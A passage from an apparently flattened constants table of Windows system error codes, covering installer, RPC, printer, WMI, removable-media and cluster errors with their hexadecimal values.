ERROR_INSTALL_TRANSFORM_FAILURE = 0x0658 + ERROR_INSTALL_PACKAGE_REJECTED = 0x0659 + ERROR_FUNCTION_NOT_CALLED = 0x065A + ERROR_FUNCTION_FAILED = 0x065B + ERROR_INVALID_TABLE = 0x065C + ERROR_DATATYPE_MISMATCH = 0x065D + ERROR_UNSUPPORTED_TYPE = 0x065E + ERROR_CREATE_FAILED = 0x065F + ERROR_INSTALL_TEMP_UNWRITABLE = 0x0660 + ERROR_INSTALL_PLATFORM_UNSUPPORTED = 0x0661 + ERROR_INSTALL_NOTUSED = 0x0662 + ERROR_PATCH_PACKAGE_OPEN_FAILED = 0x0663 + ERROR_PATCH_PACKAGE_INVALID = 0x0664 + ERROR_PATCH_PACKAGE_UNSUPPORTED = 0x0665 + ERROR_PRODUCT_VERSION = 0x0666 + ERROR_INVALID_COMMAND_LINE = 0x0667 + ERROR_INSTALL_REMOTE_DISALLOWED = 0x0668 + ERROR_SUCCESS_REBOOT_INITIATED = 0x0669 + ERROR_PATCH_TARGET_NOT_FOUND = 0x066A + ERROR_PATCH_PACKAGE_REJECTED = 0x066B + ERROR_INSTALL_TRANSFORM_REJECTED = 0x066C + ERROR_INSTALL_REMOTE_PROHIBITED = 0x066D + ERROR_PATCH_REMOVAL_UNSUPPORTED = 0x066E + ERROR_UNKNOWN_PATCH = 0x066F + ERROR_PATCH_NO_SEQUENCE = 0x0670 + ERROR_PATCH_REMOVAL_DISALLOWED = 0x0671 + ERROR_INVALID_PATCH_XML = 0x0672 + ERROR_PATCH_MANAGED_ADVERTISED_PRODUCT = 0x0673 + ERROR_INSTALL_SERVICE_SAFEBOOT = 0x0674 + ERROR_FAIL_FAST_EXCEPTION = 0x0675 + RPC_S_INVALID_STRING_BINDING = 0x06A4 + RPC_S_WRONG_KIND_OF_BINDING = 0x06A5 + RPC_S_INVALID_BINDING = 0x06A6 + RPC_S_PROTSEQ_NOT_SUPPORTED = 0x06A7 + RPC_S_INVALID_RPC_PROTSEQ = 0x06A8 + RPC_S_INVALID_STRING_UUID = 0x06A9 + RPC_S_INVALID_ENDPOINT_FORMAT = 0x06AA + RPC_S_INVALID_NET_ADDR = 0x06AB + RPC_S_NO_ENDPOINT_FOUND = 0x06AC + RPC_S_INVALID_TIMEOUT = 0x06AD + RPC_S_OBJECT_NOT_FOUND = 0x06AE + RPC_S_ALREADY_REGISTERED = 0x06AF + RPC_S_TYPE_ALREADY_REGISTERED = 0x06B0 + RPC_S_ALREADY_LISTENING = 0x06B1 + RPC_S_NO_PROTSEQS_REGISTERED = 0x06B2 + RPC_S_NOT_LISTENING = 0x06B3 + RPC_S_UNKNOWN_MGR_TYPE = 0x06B4 + RPC_S_UNKNOWN_IF = 0x06B5 + RPC_S_NO_BINDINGS = 0x06B6 + RPC_S_NO_PROTSEQS = 0x06B7 + RPC_S_CANT_CREATE_ENDPOINT = 0x06B8 + RPC_S_OUT_OF_RESOURCES = 0x06B9 + RPC_S_SERVER_UNAVAILABLE = 0x06BA + RPC_S_SERVER_TOO_BUSY = 0x06BB + RPC_S_INVALID_NETWORK_OPTIONS = 0x06BC + RPC_S_NO_CALL_ACTIVE = 0x06BD + RPC_S_CALL_FAILED = 0x06BE + RPC_S_CALL_FAILED_DNE = 0x06BF + RPC_S_PROTOCOL_ERROR = 0x06C0 + RPC_S_PROXY_ACCESS_DENIED = 0x06C1 + RPC_S_UNSUPPORTED_TRANS_SYN = 0x06C2 + RPC_S_UNSUPPORTED_TYPE = 0x06C4 + RPC_S_INVALID_TAG = 0x06C5 + RPC_S_INVALID_BOUND = 0x06C6 + RPC_S_NO_ENTRY_NAME = 0x06C7 + RPC_S_INVALID_NAME_SYNTAX = 0x06C8 + RPC_S_UNSUPPORTED_NAME_SYNTAX = 0x06C9 + RPC_S_UUID_NO_ADDRESS = 0x06CB + RPC_S_DUPLICATE_ENDPOINT = 0x06CC + RPC_S_UNKNOWN_AUTHN_TYPE = 0x06CD + RPC_S_MAX_CALLS_TOO_SMALL = 0x06CE + RPC_S_STRING_TOO_LONG = 0x06CF + RPC_S_PROTSEQ_NOT_FOUND = 0x06D0 + RPC_S_PROCNUM_OUT_OF_RANGE = 0x06D1 + RPC_S_BINDING_HAS_NO_AUTH = 0x06D2 + RPC_S_UNKNOWN_AUTHN_SERVICE = 0x06D3 + RPC_S_UNKNOWN_AUTHN_LEVEL = 0x06D4 + RPC_S_INVALID_AUTH_IDENTITY = 0x06D5 + RPC_S_UNKNOWN_AUTHZ_SERVICE = 0x06D6 + EPT_S_INVALID_ENTRY = 0x06D7 + EPT_S_CANT_PERFORM_OP = 0x06D8 + EPT_S_NOT_REGISTERED = 0x06D9 + RPC_S_NOTHING_TO_EXPORT = 0x06DA + RPC_S_INCOMPLETE_NAME = 0x06DB + RPC_S_INVALID_VERS_OPTION = 0x06DC + RPC_S_NO_MORE_MEMBERS = 0x06DD + RPC_S_NOT_ALL_OBJS_UNEXPORTED = 0x06DE + RPC_S_INTERFACE_NOT_FOUND = 0x06DF + RPC_S_ENTRY_ALREADY_EXISTS = 0x06E0 + RPC_S_ENTRY_NOT_FOUND = 0x06E1 + RPC_S_NAME_SERVICE_UNAVAILABLE = 0x06E2 + RPC_S_INVALID_NAF_ID = 0x06E3 + RPC_S_CANNOT_SUPPORT = 0x06E4 + RPC_S_NO_CONTEXT_AVAILABLE = 0x06E5 + RPC_S_INTERNAL_ERROR = 0x06E6 + RPC_S_ZERO_DIVIDE = 0x06E7 + RPC_S_ADDRESS_ERROR = 0x06E8 + RPC_S_FP_DIV_ZERO = 0x06E9 + RPC_S_FP_UNDERFLOW = 0x06EA + RPC_S_FP_OVERFLOW = 0x06EB + RPC_X_NO_MORE_ENTRIES = 0x06EC + RPC_X_SS_CHAR_TRANS_OPEN_FAIL = 0x06ED + RPC_X_SS_CHAR_TRANS_SHORT_FILE = 0x06EE + RPC_X_SS_IN_NULL_CONTEXT = 0x06EF + RPC_X_SS_CONTEXT_DAMAGED = 0x06F1 + RPC_X_SS_HANDLES_MISMATCH = 0x06F2 + RPC_X_SS_CANNOT_GET_CALL_HANDLE = 0x06F3 + RPC_X_NULL_REF_POINTER = 0x06F4 + RPC_X_ENUM_VALUE_OUT_OF_RANGE = 0x06F5 + RPC_X_BYTE_COUNT_TOO_SMALL = 0x06F6 + RPC_X_BAD_STUB_DATA = 0x06F7 + ERROR_INVALID_USER_BUFFER = 0x06F8 + ERROR_UNRECOGNIZED_MEDIA = 0x06F9 + ERROR_NO_TRUST_LSA_SECRET = 0x06FA + ERROR_NO_TRUST_SAM_ACCOUNT = 0x06FB + ERROR_TRUSTED_DOMAIN_FAILURE = 0x06FC + ERROR_TRUSTED_RELATIONSHIP_FAILURE = 0x06FD + ERROR_TRUST_FAILURE = 0x06FE + RPC_S_CALL_IN_PROGRESS = 0x06FF + ERROR_NETLOGON_NOT_STARTED = 0x0700 + ERROR_ACCOUNT_EXPIRED = 0x0701 + ERROR_REDIRECTOR_HAS_OPEN_HANDLES = 0x0702 + ERROR_PRINTER_DRIVER_ALREADY_INSTALLED = 0x0703 + ERROR_UNKNOWN_PORT = 0x0704 + ERROR_UNKNOWN_PRINTER_DRIVER = 0x0705 + ERROR_UNKNOWN_PRINTPROCESSOR = 0x0706 + ERROR_INVALID_SEPARATOR_FILE = 0x0707 + ERROR_INVALID_PRIORITY = 0x0708 + ERROR_INVALID_PRINTER_NAME = 0x0709 + ERROR_PRINTER_ALREADY_EXISTS = 0x070A + ERROR_INVALID_PRINTER_COMMAND = 0x070B + ERROR_INVALID_DATATYPE = 0x070C + ERROR_INVALID_ENVIRONMENT = 0x070D + RPC_S_NO_MORE_BINDINGS = 0x070E + ERROR_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT = 0x070F + ERROR_NOLOGON_WORKSTATION_TRUST_ACCOUNT = 0x0710 + ERROR_NOLOGON_SERVER_TRUST_ACCOUNT = 0x0711 + ERROR_DOMAIN_TRUST_INCONSISTENT = 0x0712 + ERROR_SERVER_HAS_OPEN_HANDLES = 0x0713 + ERROR_RESOURCE_DATA_NOT_FOUND = 0x0714 + ERROR_RESOURCE_TYPE_NOT_FOUND = 0x0715 + ERROR_RESOURCE_NAME_NOT_FOUND = 0x0716 + ERROR_RESOURCE_LANG_NOT_FOUND = 0x0717 + ERROR_NOT_ENOUGH_QUOTA = 0x0718 + RPC_S_NO_INTERFACES = 0x0719 + RPC_S_CALL_CANCELLED = 0x071A + RPC_S_BINDING_INCOMPLETE = 0x071B + RPC_S_COMM_FAILURE = 0x071C + RPC_S_UNSUPPORTED_AUTHN_LEVEL = 0x071D + RPC_S_NO_PRINC_NAME = 0x071E + RPC_S_NOT_RPC_ERROR = 0x071F + RPC_S_UUID_LOCAL_ONLY = 0x0720 + RPC_S_SEC_PKG_ERROR = 0x0721 + RPC_S_NOT_CANCELLED = 0x0722 + RPC_X_INVALID_ES_ACTION = 0x0723 + RPC_X_WRONG_ES_VERSION = 0x0724 + RPC_X_WRONG_STUB_VERSION = 0x0725 + RPC_X_INVALID_PIPE_OBJECT = 0x0726 + RPC_X_WRONG_PIPE_ORDER = 0x0727 + RPC_X_WRONG_PIPE_VERSION = 0x0728 + RPC_S_COOKIE_AUTH_FAILED = 0x0729 + RPC_S_GROUP_MEMBER_NOT_FOUND = 0x076A + EPT_S_CANT_CREATE = 0x076B + RPC_S_INVALID_OBJECT = 0x076C + ERROR_INVALID_TIME = 0x076D + ERROR_INVALID_FORM_NAME = 0x076E + ERROR_INVALID_FORM_SIZE = 0x076F + ERROR_ALREADY_WAITING = 0x0770 + ERROR_PRINTER_DELETED = 0x0771 + ERROR_INVALID_PRINTER_STATE = 0x0772 + ERROR_PASSWORD_MUST_CHANGE = 0x0773 + ERROR_DOMAIN_CONTROLLER_NOT_FOUND = 0x0774 + ERROR_ACCOUNT_LOCKED_OUT = 0x0775 + OR_INVALID_OXID = 0x0776 + OR_INVALID_OID = 0x0777 + OR_INVALID_SET = 0x0778 + RPC_S_SEND_INCOMPLETE = 0x0779 + RPC_S_INVALID_ASYNC_HANDLE = 0x077A + RPC_S_INVALID_ASYNC_CALL = 0x077B + RPC_X_PIPE_CLOSED = 0x077C + RPC_X_PIPE_DISCIPLINE_ERROR = 0x077D + RPC_X_PIPE_EMPTY = 0x077E + ERROR_NO_SITENAME = 0x077F + ERROR_CANT_ACCESS_FILE = 0x0780 + ERROR_CANT_RESOLVE_FILENAME = 0x0781 + RPC_S_ENTRY_TYPE_MISMATCH = 0x0782 + RPC_S_NOT_ALL_OBJS_EXPORTED = 0x0783 + RPC_S_INTERFACE_NOT_EXPORTED = 0x0784 + RPC_S_PROFILE_NOT_ADDED = 0x0785 + RPC_S_PRF_ELT_NOT_ADDED = 0x0786 + RPC_S_PRF_ELT_NOT_REMOVED = 0x0787 + RPC_S_GRP_ELT_NOT_ADDED = 0x0788 + RPC_S_GRP_ELT_NOT_REMOVED = 0x0789 + ERROR_KM_DRIVER_BLOCKED = 0x078A + ERROR_CONTEXT_EXPIRED = 0x078B + ERROR_PER_USER_TRUST_QUOTA_EXCEEDED = 0x078C + ERROR_ALL_USER_TRUST_QUOTA_EXCEEDED = 0x078D + ERROR_USER_DELETE_TRUST_QUOTA_EXCEEDED = 0x078E + ERROR_AUTHENTICATION_FIREWALL_FAILED = 0x078F + ERROR_REMOTE_PRINT_CONNECTIONS_BLOCKED = 0x0790 + ERROR_NTLM_BLOCKED = 0x0791 + ERROR_INVALID_PIXEL_FORMAT = 0x07D0 + ERROR_BAD_DRIVER = 0x07D1 + ERROR_INVALID_WINDOW_STYLE = 0x07D2 + ERROR_METAFILE_NOT_SUPPORTED = 0x07D3 + ERROR_TRANSFORM_NOT_SUPPORTED = 0x07D4 + ERROR_CLIPPING_NOT_SUPPORTED = 0x07D5 + ERROR_INVALID_CMM = 0x07DA + ERROR_INVALID_PROFILE = 0x07DB + ERROR_TAG_NOT_FOUND = 0x07DC + ERROR_TAG_NOT_PRESENT = 0x07DD + ERROR_DUPLICATE_TAG = 0x07DE + ERROR_PROFILE_NOT_ASSOCIATED_WITH_DEVICE = 0x07DF + ERROR_PROFILE_NOT_FOUND = 0x07E0 + ERROR_INVALID_COLORSPACE = 0x07E1 + ERROR_ICM_NOT_ENABLED = 0x07E2 + ERROR_DELETING_ICM_XFORM = 0x07E3 + ERROR_INVALID_TRANSFORM = 0x07E4 + ERROR_COLORSPACE_MISMATCH = 0x07E5 + ERROR_INVALID_COLORINDEX = 0x07E6 + ERROR_PROFILE_DOES_NOT_MATCH_DEVICE = 0x07E7 + ERROR_CONNECTED_OTHER_PASSWORD = 0x083C + ERROR_CONNECTED_OTHER_PASSWORD_DEFAULT = 0x083D + ERROR_BAD_USERNAME = 0x089A + ERROR_NOT_CONNECTED = 0x08CA + ERROR_OPEN_FILES = 0x0961 + ERROR_ACTIVE_CONNECTIONS = 0x0962 + ERROR_DEVICE_IN_USE = 0x0964 + ERROR_UNKNOWN_PRINT_MONITOR = 0x0BB8 + ERROR_PRINTER_DRIVER_IN_USE = 0x0BB9 + ERROR_SPOOL_FILE_NOT_FOUND = 0x0BBA + ERROR_SPL_NO_STARTDOC = 0x0BBB + ERROR_SPL_NO_ADDJOB = 0x0BBC + ERROR_PRINT_PROCESSOR_ALREADY_INSTALLED = 0x0BBD + ERROR_PRINT_MONITOR_ALREADY_INSTALLED = 0x0BBE + ERROR_INVALID_PRINT_MONITOR = 0x0BBF + ERROR_PRINT_MONITOR_IN_USE = 0x0BC0 + ERROR_PRINTER_HAS_JOBS_QUEUED = 0x0BC1 + ERROR_SUCCESS_REBOOT_REQUIRED = 0x0BC2 + ERROR_SUCCESS_RESTART_REQUIRED = 0x0BC3 + ERROR_PRINTER_NOT_FOUND = 0x0BC4 + ERROR_PRINTER_DRIVER_WARNED = 0x0BC5 + ERROR_PRINTER_DRIVER_BLOCKED = 0x0BC6 + ERROR_PRINTER_DRIVER_PACKAGE_IN_USE = 0x0BC7 + ERROR_CORE_DRIVER_PACKAGE_NOT_FOUND = 0x0BC8 + ERROR_FAIL_REBOOT_REQUIRED = 0x0BC9 + ERROR_FAIL_REBOOT_INITIATED = 0x0BCA + ERROR_PRINTER_DRIVER_DOWNLOAD_NEEDED = 0x0BCB + ERROR_PRINT_JOB_RESTART_REQUIRED = 0x0BCC + ERROR_IO_REISSUE_AS_CACHED = 0x0F6E + ERROR_WINS_INTERNAL = 0x0FA0 + ERROR_CAN_NOT_DEL_LOCAL_WINS = 0x0FA1 + ERROR_STATIC_INIT = 0x0FA2 + ERROR_INC_BACKUP = 0x0FA3 + ERROR_FULL_BACKUP = 0x0FA4 + ERROR_REC_NON_EXISTENT = 0x0FA5 + ERROR_RPL_NOT_ALLOWED = 0x0FA6 + PEERDIST_ERROR_CONTENTINFO_VERSION_UNSUPPORTED = 0x0FD2 + PEERDIST_ERROR_CANNOT_PARSE_CONTENTINFO = 0x0FD3 + PEERDIST_ERROR_MISSING_DATA = 0x0FD4 + PEERDIST_ERROR_NO_MORE = 0x0FD5 + PEERDIST_ERROR_NOT_INITIALIZED = 0x0FD6 + PEERDIST_ERROR_ALREADY_INITIALIZED = 0x0FD7 + PEERDIST_ERROR_SHUTDOWN_IN_PROGRESS = 0x0FD8 + PEERDIST_ERROR_INVALIDATED = 0x0FD9 + PEERDIST_ERROR_ALREADY_EXISTS = 0x0FDA + PEERDIST_ERROR_OPERATION_NOTFOUND = 0x0FDB + PEERDIST_ERROR_ALREADY_COMPLETED = 0x0FDC + PEERDIST_ERROR_OUT_OF_BOUNDS = 0x0FDD + PEERDIST_ERROR_VERSION_UNSUPPORTED = 0x0FDE + PEERDIST_ERROR_INVALID_CONFIGURATION = 0x0FDF + PEERDIST_ERROR_NOT_LICENSED = 0x0FE0 + PEERDIST_ERROR_SERVICE_UNAVAILABLE = 0x0FE1 + ERROR_DHCP_ADDRESS_CONFLICT = 0x1004 + ERROR_WMI_GUID_NOT_FOUND = 0x1068 + ERROR_WMI_INSTANCE_NOT_FOUND = 0x1069 + ERROR_WMI_ITEMID_NOT_FOUND = 0x106A + ERROR_WMI_TRY_AGAIN = 0x106B + ERROR_WMI_DP_NOT_FOUND = 0x106C + ERROR_WMI_UNRESOLVED_INSTANCE_REF = 0x106D + ERROR_WMI_ALREADY_ENABLED = 0x106E + ERROR_WMI_GUID_DISCONNECTED = 0x106F + ERROR_WMI_SERVER_UNAVAILABLE = 0x1070 + ERROR_WMI_DP_FAILED = 0x1071 + ERROR_WMI_INVALID_MOF = 0x1072 + ERROR_WMI_INVALID_REGINFO = 0x1073 + ERROR_WMI_ALREADY_DISABLED = 0x1074 + ERROR_WMI_READ_ONLY = 0x1075 + ERROR_WMI_SET_FAILURE = 0x1076 + ERROR_INVALID_MEDIA = 0x10CC + ERROR_INVALID_LIBRARY = 0x10CD + ERROR_INVALID_MEDIA_POOL = 0x10CE + ERROR_DRIVE_MEDIA_MISMATCH = 0x10CF + ERROR_MEDIA_OFFLINE = 0x10D0 + ERROR_LIBRARY_OFFLINE = 0x10D1 + ERROR_EMPTY = 0x10D2 + ERROR_NOT_EMPTY = 0x10D3 + ERROR_MEDIA_UNAVAILABLE = 0x10D4 + ERROR_RESOURCE_DISABLED = 0x10D5 + ERROR_INVALID_CLEANER = 0x10D6 + ERROR_UNABLE_TO_CLEAN = 0x10D7 + ERROR_OBJECT_NOT_FOUND = 0x10D8 + ERROR_DATABASE_FAILURE = 0x10D9 + ERROR_DATABASE_FULL = 0x10DA + ERROR_MEDIA_INCOMPATIBLE = 0x10DB + ERROR_RESOURCE_NOT_PRESENT = 0x10DC + ERROR_INVALID_OPERATION = 0x10DD + ERROR_MEDIA_NOT_AVAILABLE = 0x10DE + ERROR_DEVICE_NOT_AVAILABLE = 0x10DF + ERROR_REQUEST_REFUSED = 0x10E0 + ERROR_INVALID_DRIVE_OBJECT = 0x10E1 + ERROR_LIBRARY_FULL = 0x10E2 + ERROR_MEDIUM_NOT_ACCESSIBLE = 0x10E3 + ERROR_UNABLE_TO_LOAD_MEDIUM = 0x10E4 + ERROR_UNABLE_TO_INVENTORY_DRIVE = 0x10E5 + ERROR_UNABLE_TO_INVENTORY_SLOT = 0x10E6 + ERROR_UNABLE_TO_INVENTORY_TRANSPORT = 0x10E7 + ERROR_TRANSPORT_FULL = 0x10E8 + ERROR_CONTROLLING_IEPORT = 0x10E9 + ERROR_UNABLE_TO_EJECT_MOUNTED_MEDIA = 0x10EA + ERROR_CLEANER_SLOT_SET = 0x10EB + ERROR_CLEANER_SLOT_NOT_SET = 0x10EC + ERROR_CLEANER_CARTRIDGE_SPENT = 0x10ED + ERROR_UNEXPECTED_OMID = 0x10EE + ERROR_CANT_DELETE_LAST_ITEM = 0x10EF + ERROR_MESSAGE_EXCEEDS_MAX_SIZE = 0x10F0 + ERROR_VOLUME_CONTAINS_SYS_FILES = 0x10F1 + ERROR_INDIGENOUS_TYPE = 0x10F2 + ERROR_NO_SUPPORTING_DRIVES = 0x10F3 + ERROR_CLEANER_CARTRIDGE_INSTALLED = 0x10F4 + ERROR_IEPORT_FULL = 0x10F5 + ERROR_FILE_OFFLINE = 0x10FE + ERROR_REMOTE_STORAGE_NOT_ACTIVE = 0x10FF + ERROR_REMOTE_STORAGE_MEDIA_ERROR = 0x1100 + ERROR_NOT_A_REPARSE_POINT = 0x1126 + ERROR_REPARSE_ATTRIBUTE_CONFLICT = 0x1127 + ERROR_INVALID_REPARSE_DATA = 0x1128 + ERROR_REPARSE_TAG_INVALID = 0x1129 + ERROR_REPARSE_TAG_MISMATCH = 0x112A + ERROR_VOLUME_NOT_SIS_ENABLED = 0x1194 + ERROR_DEPENDENT_RESOURCE_EXISTS = 0x1389 + ERROR_DEPENDENCY_NOT_FOUND = 0x138A + ERROR_DEPENDENCY_ALREADY_EXISTS = 0x138B + ERROR_RESOURCE_NOT_ONLINE = 0x138C + ERROR_HOST_NODE_NOT_AVAILABLE = 0x138D + ERROR_RESOURCE_NOT_AVAILABLE = 0x138E + ERROR_RESOURCE_NOT_FOUND = 0x138F + ERROR_SHUTDOWN_CLUSTER = 0x1390 + ERROR_CANT_EVICT_ACTIVE_NODE = 0x1391 + ERROR_OBJECT_ALREADY_EXISTS = 0x1392 + ERROR_OBJECT_IN_LIST = 0x1393 + ERROR_GROUP_NOT_AVAILABLE = 0x1394 + ERROR_GROUP_NOT_FOUND = 0x1395 + ERROR_GROUP_NOT_ONLINE = 0x1396 + ERROR_HOST_NODE_NOT_RESOURCE_OWNER = 0x1397 + ERROR_HOST_NODE_NOT_GROUP_OWNER = 0x1398 + ERROR_RESMON_CREATE_FAILED = 0x1399 + ERROR_RESMON_ONLINE_FAILED = 0x139A + ERROR_RESOURCE_ONLINE = 0x139B + ERROR_QUORUM_RESOURCE = 0x139C + ERROR_NOT_QUORUM_CAPABLE = 0x139D + ERROR_CLUSTER_SHUTTING_DOWN = 0x139E + ERROR_INVALID_STATE = 0x139F + ERROR_RESOURCE_PROPERTIES_STORED = 0x13A0 + ERROR_NOT_QUORUM_CLASS = 0x13A1 + ERROR_CORE_RESOURCE = 0x13A2 + ERROR_QUORUM_RESOURCE_ONLINE_FAILED = 0x13A3 + ERROR_QUORUMLOG_OPEN_FAILED = 0x13A4 + ERROR_CLUSTERLOG_CORRUPT = 0x13A5 + ERROR_CLUSTERLOG_RECORD_EXCEEDS_MAXSIZE = 0x13A6 + ERROR_CLUSTERLOG_EXCEEDS_MAXSIZE = 0x13A7 + ERROR_CLUSTERLOG_CHKPOINT_NOT_FOUND = 0x13A8 + ERROR_CLUSTERLOG_NOT_ENOUGH_SPACE = 0x13A9 + ERROR_QUORUM_OWNER_ALIVE = 0x13AA + ERROR_NETWORK_NOT_AVAILABLE = 0x13AB + ERROR_NODE_NOT_AVAILABLE = 0x13AC + ERROR_ALL_NODES_NOT_AVAILABLE = 0x13AD + ERROR_RESOURCE_FAILED = 0x13AE + ERROR_CLUSTER_INVALID_NODE = 0x13AF + ERROR_CLUSTER_NODE_EXISTS = 0x13B0 + ERROR_CLUSTER_JOIN_IN_PROGRESS = 0x13B1 + ERROR_CLUSTER_NODE_NOT_FOUND = 0x13B2 + ERROR_CLUSTER_LOCAL_NODE_NOT_FOUND = 0x13B3 + ERROR_CLUSTER_NETWORK_EXISTS = 0x13B4 + ERROR_CLUSTER_NETWORK_NOT_FOUND = 0x13B5 + ERROR_CLUSTER_NETINTERFACE_EXISTS = 0x13B6 + ERROR_CLUSTER_NETINTERFACE_NOT_FOUND = 0x13B7 + ERROR_CLUSTER_INVALID_REQUEST = 0x13B8 + ERROR_CLUSTER_INVALID_NETWORK_PROVIDER = 0x13B9 + ERROR_CLUSTER_NODE_DOWN = 0x13BA + ERROR_CLUSTER_NODE_UNREACHABLE = 0x13BB + ERROR_CLUSTER_NODE_NOT_MEMBER = 0x13BC + ERROR_CLUSTER_JOIN_NOT_IN_PROGRESS = 0x13BD + ERROR_CLUSTER_INVALID_NETWORK = 0x13BE + ERROR_CLUSTER_NODE_UP = 0x13C0 + ERROR_CLUSTER_IPADDR_IN_USE = 0x13C1 + ERROR_CLUSTER_NODE_NOT_PAUSED = 0x13C2 + ERROR_CLUSTER_NO_SECURITY_CONTEXT = 0x13C3 + ERROR_CLUSTER_NETWORK_NOT_INTERNAL = 0x13C4 + ERROR_CLUSTER_NODE_ALREADY_UP = 0x13C5 + ERROR_CLUSTER_NODE_ALREADY_DOWN = 0x13C6 + ERROR_CLUSTER_NETWORK_ALREADY_ONLINE = 0x13C7 + ERROR_CLUSTER_NETWORK_ALREADY_OFFLINE = 0x13C8 + ERROR_CLUSTER_NODE_ALREADY_MEMBER = 0x13C9 + ERROR_CLUSTER_LAST_INTERNAL_NETWORK = 0x13CA + ERROR_CLUSTER_NETWORK_HAS_DEPENDENTS = 0x13CB + ERROR_INVALID_OPERATION_ON_QUORUM = 0x13CC + ERROR_DEPENDENCY_NOT_ALLOWED = 0x13CD + ERROR_CLUSTER_NODE_PAUSED = 0x13CE + ERROR_NODE_CANT_HOST_RESOURCE = 0x13CF + ERROR_CLUSTER_NODE_NOT_READY = 0x13D0 + ERROR_CLUSTER_NODE_SHUTTING_DOWN = 0x13D1 + ERROR_CLUSTER_JOIN_ABORTED = 0x13D2 + ERROR_CLUSTER_INCOMPATIBLE_VERSIONS = 0x13D3 + ERROR_CLUSTER_MAXNUM_OF_RESOURCES_EXCEEDED = 0x13D4 + ERROR_CLUSTER_SYSTEM_CONFIG_CHANGED = 0x13D5 + ERROR_CLUSTER_RESOURCE_TYPE_NOT_FOUND = 0x13D6 + ERROR_CLUSTER_RESTYPE_NOT_SUPPORTED = 0x13D7 + ERROR_CLUSTER_RESNAME_NOT_FOUND = 0x13D8 + ERROR_CLUSTER_NO_RPC_PACKAGES_REGISTERED = 0x13D9 + ERROR_CLUSTER_OWNER_NOT_IN_PREFLIST = 0x13DA + ERROR_CLUSTER_DATABASE_SEQMISMATCH = 0x13DB + ERROR_RESMON_INVALID_STATE = 0x13DC + ERROR_CLUSTER_GUM_NOT_LOCKER = 0x13DD + ERROR_QUORUM_DISK_NOT_FOUND = 0x13DE + ERROR_DATABASE_BACKUP_CORRUPT = 0x13DF + ERROR_CLUSTER_NODE_ALREADY_HAS_DFS_ROOT = 0x13E0 + ERROR_RESOURCE_PROPERTY_UNCHANGEABLE = 0x13E1 + ERROR_CLUSTER_MEMBERSHIP_INVALID_STATE = 0x1702 + ERROR_CLUSTER_QUORUMLOG_NOT_FOUND = 0x1703 + ERROR_CLUSTER_MEMBERSHIP_HALT = 0x1704 + ERROR_CLUSTER_INSTANCE_ID_MISMATCH = 0x1705 + ERROR_CLUSTER_NETWORK_NOT_FOUND_FOR_IP = 0x1706 + ERROR_CLUSTER_PROPERTY_DATA_TYPE_MISMATCH = 0x1707 + ERROR_CLUSTER_EVICT_WITHOUT_CLEANUP = 0x1708 + ERROR_CLUSTER_PARAMETER_MISMATCH = 0x1709 + ERROR_NODE_CANNOT_BE_CLUSTERED = 0x170A + ERROR_CLUSTER_WRONG_OS_VERSION = 0x170B + ERROR_CLUSTER_CANT_CREATE_DUP_CLUSTER_NAME = 0x170C + ERROR_CLUSCFG_ALREADY_COMMITTED = 0x170D + ERROR_CLUSCFG_ROLLBACK_FAILED = 0x170E + ERROR_CLUSCFG_SYSTEM_DISK_DRIVE_LETTER_CONFLICT = 0x170F + ERROR_CLUSTER_OLD_VERSION = 0x1710 + ERROR_CLUSTER_MISMATCHED_COMPUTER_ACCT_NAME = 0x1711 + ERROR_CLUSTER_NO_NET_ADAPTERS = 0x1712 + ERROR_CLUSTER_POISONED = 0x1713 + ERROR_CLUSTER_GROUP_MOVING = 0x1714 + ERROR_CLUSTER_RESOURCE_TYPE_BUSY = 0x1715 + ERROR_RESOURCE_CALL_TIMED_OUT = 0x1716 + ERROR_INVALID_CLUSTER_IPV6_ADDRESS = 0x1717 + ERROR_CLUSTER_INTERNAL_INVALID_FUNCTION = 0x1718 + ERROR_CLUSTER_PARAMETER_OUT_OF_BOUNDS = 0x1719 + ERROR_CLUSTER_PARTIAL_SEND = 0x171A + ERROR_CLUSTER_REGISTRY_INVALID_FUNCTION = 0x171B + ERROR_CLUSTER_INVALID_STRING_TERMINATION = 0x171C + ERROR_CLUSTER_INVALID_STRING_FORMAT = 0x171D + ERROR_CLUSTER_DATABASE_TRANSACTION_IN_PROGRESS = 0x171E + ERROR_CLUSTER_DATABASE_TRANSACTION_NOT_IN_PROGRESS = 0x171F + ERROR_CLUSTER_NULL_DATA = 0x1720 + ERROR_CLUSTER_PARTIAL_READ = 0x1721 + ERROR_CLUSTER_PARTIAL_WRITE = 0x1722 + ERROR_CLUSTER_CANT_DESERIALIZE_DATA = 0x1723 + ERROR_DEPENDENT_RESOURCE_PROPERTY_CONFLICT = 0x1724 + ERROR_CLUSTER_NO_QUORUM = 0x1725 + ERROR_CLUSTER_INVALID_IPV6_NETWORK = 0x1726 + ERROR_CLUSTER_INVALID_IPV6_TUNNEL_NETWORK = 0x1727 + ERROR_QUORUM_NOT_ALLOWED_IN_THIS_GROUP = 0x1728 + ERROR_DEPENDENCY_TREE_TOO_COMPLEX = 0x1729 + ERROR_EXCEPTION_IN_RESOURCE_CALL = 0x172A + ERROR_CLUSTER_RHS_FAILED_INITIALIZATION = 0x172B + ERROR_CLUSTER_NOT_INSTALLED = 0x172C + ERROR_CLUSTER_RESOURCES_MUST_BE_ONLINE_ON_THE_SAME_NODE = 0x172D + ERROR_CLUSTER_MAX_NODES_IN_CLUSTER = 0x172E + ERROR_CLUSTER_TOO_MANY_NODES = 0x172F + ERROR_CLUSTER_OBJECT_ALREADY_USED = 0x1730 + ERROR_NONCORE_GROUPS_FOUND = 0x1731 + ERROR_FILE_SHARE_RESOURCE_CONFLICT = 0x1732 + ERROR_CLUSTER_EVICT_INVALID_REQUEST = 0x1733 + ERROR_CLUSTER_SINGLETON_RESOURCE = 0x1734 + ERROR_CLUSTER_GROUP_SINGLETON_RESOURCE = 0x1735 + ERROR_CLUSTER_RESOURCE_PROVIDER_FAILED = 0x1736 + ERROR_CLUSTER_RESOURCE_CONFIGURATION_ERROR = 0x1737 + ERROR_CLUSTER_GROUP_BUSY = 0x1738 + ERROR_CLUSTER_NOT_SHARED_VOLUME = 0x1739 + ERROR_CLUSTER_INVALID_SECURITY_DESCRIPTOR = 0x173A + ERROR_CLUSTER_SHARED_VOLUMES_IN_USE = 0x173B + ERROR_CLUSTER_USE_SHARED_VOLUMES_API = 0x173C + ERROR_CLUSTER_BACKUP_IN_PROGRESS = 0x173D + ERROR_NON_CSV_PATH = 0x173E + ERROR_CSV_VOLUME_NOT_LOCAL = 0x173F + ERROR_CLUSTER_WATCHDOG_TERMINATING = 0x1740 + 